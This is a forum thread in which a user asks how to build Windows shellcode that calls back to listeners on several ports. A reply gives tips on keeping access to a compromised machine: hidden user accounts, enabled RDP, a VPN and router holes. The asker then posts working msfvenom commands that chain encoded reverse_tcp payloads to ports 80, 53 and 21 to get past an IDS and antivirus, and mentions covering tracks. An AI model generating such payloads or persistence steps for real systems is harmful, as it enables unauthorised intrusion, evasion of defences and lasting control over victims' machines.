Multiple Payloads Via Shellcode

[bobbyb1980]

Hey guys. Was wondering if anyone would be able to help me with the following:

I'm trying to generate shellcode that I can compile that will call out to multiple ports. For example, I'd want a windows/meterpreter/reverse_tcp payload that connects back to listeners on port 80, 21 and 443.

I know this is possible with msvenom to generate an .exe but I really just only need the first stage of the meterpreter payload(s) in shellcode.

Thanks.

[digip]

Meterpeter Reverse connection means they connect back to you on the port you listen on for the initial connection. The rest of what you want to do would be done in post exploitation. I don't think the initial payload opens more than one connection back to you, but I'm sure you could make it do it in post. Using an executable like with venom though, means you would be leaving something on their system, and makes it that much easier to 1, remove the malware, 2, trace back to you. You could try port binds, but then you have to figure out getting past NAT next time they reboot or logoff. Anything that touches disk though, is generally a bad move, and since metpreter runs in memory, you are also limited till their next reboot, so you have to pick how you want to do it. Personally, I would stick with legit built in functionality, like enabling RDP on their machine, adding another user and hiding it from the home logon screen, and setting up a VPN, so this way you can maintain persistence, with the built in tools of their OS, since they don't set off most antivirus, etc. You still might have issues with NAT though after a reboot, so you would need to poke holes in their router to keep a way in. If using armitage, I believe you can open multiple channels once you have an initial session, you can clone them to new channels, and ports, and migrate to multiple services, then get system to do whatever you need.

Maybe this will help - http://www.backtrack-linux.org/forums/showthread.php?t=29615

Edited June 5, 2012 by digip

[bobbyb1980]

digip - Thank you for your reply. Generating C based shellcode and compiling it into a pexe or into some other exploit has a near 100% antivirus evasion success rate so writing to disk isn't really a problem. Once you get the shell u just migrate and delete the payload and run the normal "clean up your tracks" tasks and all should be good in the world. Setting up RDP and VPN's is outside the scope of my objective, router is hard as a rock also. Just need a basic shell.

I've solved the problem (I think) so perhaps others would like to take a look. My problem is that I'm doing a lab with a beefy IDS setup. The goal is to have one .exe that will call out to multiple handlers on multiple ports so if one port fails, then hopefully another will work in attempts to evade the IDS/firewall. The following code SHOULD do that, still need to run some tests but based on past experience I think it will work (don't have my machine handy to test : ( ). God willing the ports aren't filtered.

msfvenom -p windows/shell/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=80 exitfunc=thread > /tmp/80.raw
msfvenom -p windows/shell/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=53 exitfunc=thread -c /tmp/80.raw > /tmp/53.raw
msfvenom -p windows/shell/reverse_tcp -f c -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=21 exitfunc=thread -c /tmp/53.raw > 215380.c

Personally, I would stick with legit built in functionality

We're hackers - we create our own built in functionality : )